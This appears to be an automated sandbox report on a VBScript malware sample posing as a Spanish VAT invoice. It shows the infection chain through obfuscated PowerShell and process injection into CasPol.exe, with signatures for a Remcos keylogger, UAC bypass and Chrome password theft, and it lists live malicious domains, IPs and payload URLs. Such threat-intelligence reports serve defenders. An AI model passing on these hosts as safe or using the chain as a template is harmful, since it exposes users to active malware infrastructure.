behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648971 Sample: Factura de IVA.vbs Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 50 swrem.justswents.com 2->50 52 ia800705.us.archive.org 2->52 54 2 other IPs or domains 2->54 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 15 other signatures 2->82 12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 88 VBScript performs obfuscated calls to suspicious functions 12->88 90 Suspicious powershell command line found 12->90 92 Wscript starts Powershell (via cmd or directly) 12->92 94 4 other signatures 12->94 17 powershell.exe 7 12->17         started        process6 signatures7 62 Suspicious powershell command line found 17->62 64 Encrypted powershell cmdline option found 17->64 20 powershell.exe 17 19 17->20         started        24 conhost.exe 17->24         started        process8 dnsIp9 56 swrem.justswents.com 45.154.98.113, 23101, 49725, 49736 LRH-ASNL Belgium 20->56 46 C:\Users\user\AppData\...behaviorgraphthhFfutuyhw.js, ASCII 20->46 dropped 26 wscript.exe 1 1 20->26         started        file10 process11 signatures12 84 Suspicious powershell command line found 26->84 86 Wscript starts Powershell (via cmd or directly) 26->86 29 powershell.exe 17 26->29         started        process13 dnsIp14 60 ia800705.us.archive.org 207.241.230.75, 443, 49732 INTERNET-ARCHIVEUS United States 29->60 96 Writes to foreign memory regions 29->96 98 Injects a PE file into a foreign processes 29->98 33 CasPol.exe 29->33         started        36 CasPol.exe 4 16 29->36         started        40 cmd.exe 1 29->40         started        42 conhost.exe 29->42         started        signatures15 process16 dnsIp17 66 Contains functionality to bypass UAC (CMSTPLUA) 33->66 68 Contains functionalty to change the wallpaper 33->68 70 Contains functionality to steal Chrome passwords or cookies 33->70 74 2 other signatures 33->74 58 geoplugin.net 178.237.33.50, 49738, 80 ATOM86-ASATOM86NL Netherlands 36->58 48 C:\ProgramData\remcos\logs.dat, data 36->48 dropped 72 Installs a global keyboard hook 36->72 44 conhost.exe 40->44         started        file18 signatures19 process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
207.241.230.75
 ia800705.us.archive.org United States
7941 INTERNET-ARCHIVEUS true
178.237.33.50
 geoplugin.net Netherlands
8455 ATOM86-ASATOM86NL false
45.154.98.113
 dea.remwavesw.com Belgium
208264 LRH-ASNL true

Contacted Domains

Name IP Active
geoplugin.net 178.237.33.50 true
dea.remwavesw.com 45.154.98.113 true
swrem.justswents.com 45.154.98.113 true
ia800705.us.archive.org 207.241.230.75 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ia800705.us.archive.org/14/items/new_image_20250324/new_image.jpg true
  • Avira URL Cloud: malware
 unknown
http://dea.remwavesw.com/kind/mate.txt true
  • Avira URL Cloud: safe
 unknown
mold.justswgroup.com true
  • Avira URL Cloud: safe
 unknown
http://geoplugin.net/json.gp false
    		high
    http://dea.remwavesw.com/happ/MyFile02.js true
    • Avira URL Cloud: safe
    		 unknown
    swrem.justswents.com true
    • Avira URL Cloud: safe
    		 unknown